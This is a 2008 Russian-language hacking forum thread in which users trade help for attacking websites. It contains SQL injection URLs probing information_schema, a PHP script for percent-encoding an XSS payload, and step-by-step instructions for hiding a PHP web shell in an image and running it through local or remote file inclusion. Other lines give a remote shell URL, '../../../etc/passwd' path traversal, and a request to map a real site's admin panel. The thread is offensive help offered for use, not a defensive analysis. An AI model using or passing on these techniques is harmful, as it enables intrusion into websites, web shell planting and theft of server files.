 |
|
18.07.2008, 03:36
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
http://www.site.org/article.php?id=80+or+1=(SELECT+TABLE_NAME+FROM+INF ORMATION_SCHEMA.TABLES+LIMIT+1,1)--
При подстановке любого числа в лимит выдаёт одну и ту же страницу.
http://www.site.org/article.php?id=80+order+by+4
Полей *якобы* 4.
http://www.site.org/article.php?id=80+union+select+1,2,3,4
The used SELECT statements have a different number of columns
Пробывал по всякому,но ничего не вышло.Версия пятая,mysql точно,ибо в ответе сказано,что это mysql.Комменты /* не принимает,что меня,кстати,удивило.(Приним ает только -- )
|
|
|
18.07.2008, 03:41
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами:
10263663
Репутация:
1559
|
|
ссылку кинь в пм )
|
|
|
|
18.07.2008, 10:21
|
|
Участник форума
Регистрация: 02.01.2007
Сообщений: 202
С нами:
10187606
Репутация:
99
|
|
у меня такой вот вопрос, может не совсем по теме, но все-же нужно для эксплотирования уязвимости.
Как перевести обыкновенные символы (допустим <script>123</script> в код, типа
%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%7 8%74%2F%6A
???
Припомощи какой проги это делатся?
Мне просто нужно будет и скрипты и URL в такой код перевести. |
|
|
|
18.07.2008, 10:37
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
вот держи сайт http://ha.ckers.org/xss.html там думаю разберешся в функциях
|
|
|
|
18.07.2008, 11:04
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
Сообщение от schut123
у меня такой вот вопрос, может не совсем по теме, но все-же нужно для эксплотирования уязвимости.
Как перевести обыкновенные символы (допустим <script>123</script> в код, типа
???
Припомощи какой проги это делатся?
Мне просто нужно будет и скрипты и URL в такой код перевести.
PHP код:
<?
if (!isset($_GET['a']))
{
die('?a=string');
}
$a = $_GET['a'];
$len = strlen($a);
$b = '';
for($i = 0; $i < $len; $i++)
{
$b = $b.'%'.dechex(ord($a[$i]));
}
echo $b."\r\n";
?>
|
|
|
|
18.07.2008, 12:40
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
С нами:
10009826
Репутация:
435
|
|
Вообщем вопрос, как залить шелл картинкой, нираз читал про это, поидеи что нам нужно так это изменить код картинки и иметь где либо на сайте баг для исполнения пхп кода?
|
|
|
|
18.07.2008, 14:17
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Сообщение от Sharingan
Вообщем вопрос, как залить шелл картинкой, нираз читал про это, поидеи что нам нужно так это изменить код картинки и иметь где либо на сайте баг для исполнения пхп кода?
Берёшь обычную .gif/.png/.jpg картинку, открываешь любым HexViewer'om или Notepad++ (им кстати удобней), и после того что там уже изачально было (сигнатура и прочее гомно), добавляешь .php код. Далее заливаешь на нужный тебе сайт, и если там есть локальный инклуд (для ремоута сразу проще ссылку на шелл вбить), прописываешь путь до твоей картинки на сайте. При выполнении функций include()/include_once() .php код выполнится, в каком бы расширении файла он не находился.
|
|
|
|
18.07.2008, 15:10
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
С нами:
9457966
Репутация:
0
|
|
Сообщение от .Slip
Берёшь обычную .gif/.png/.jpg картинку, открываешь любым HexViewer'om или Notepad++ (им кстати удобней), и после того что там уже изачально было (сигнатура и прочее гомно), добавляешь .php код. Далее заливаешь на нужный тебе сайт, и если там есть локальный инклуд (для ремоута сразу проще ссылку на шелл вбить), прописываешь путь до твоей картинки на сайте. При выполнении функций include()/include_once() .php код выполнится, в каком бы расширении файла он не находился.
1. Надо ли код картинки оставлять? или просто php код дописать в конце?
2. Можно ли с yandex.naroda.ru делать?
например http://lol.ru?page=http://yandex.narod.ru/zloyshell.jpeg ?
3. Вот инклуд с ../../../etc/passwd как определяется кол-во ../../../ ?
4. как распознать удаленый инклуд от локального?
|
|
|
|
18.07.2008, 15:12
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
Сообщение от 2la.painkiller
1. Надо ли код картинки оставлять? или просто php дописать в конце?
2. Можно ли с yandex.naroda.ru делать?
например http://lol.ru?page=http://yandex.narod.ru/zloyshell.jpeg ?
3. Вот инклуд с ../../../etc/passwd как определяется кол-во ../../../ ?
1.
Сообщение от .Slip
после того что там уже изачально было
2. можно, если удаленный инклюд
3. зависит от количества заданных каталогов в параметре. Т.е. если изначально запрос
include(/var/www/domain/vasya.ru/$page)
то кол-во .. будет равно 4. Но переборщить с .. нельзя) т.е. если в этом примере ты напишешь 30 .., то хуже не будет  выше корня не уйдешь.
4. Пробуешь открыть скрипт, расположенный на др. сервере, если не открывает, то или отключено, или инклуд не удаленный.
Последний раз редактировалось n0ne; 18.07.2008 в 15:19..
|
|
|
|
18.07.2008, 15:17
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
С нами:
9457966
Репутация:
0
|
|
спс всем! %)
а на счет админки http://www.mirf1.ru/
как или какими прогамми можно узнать строение сайта?
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
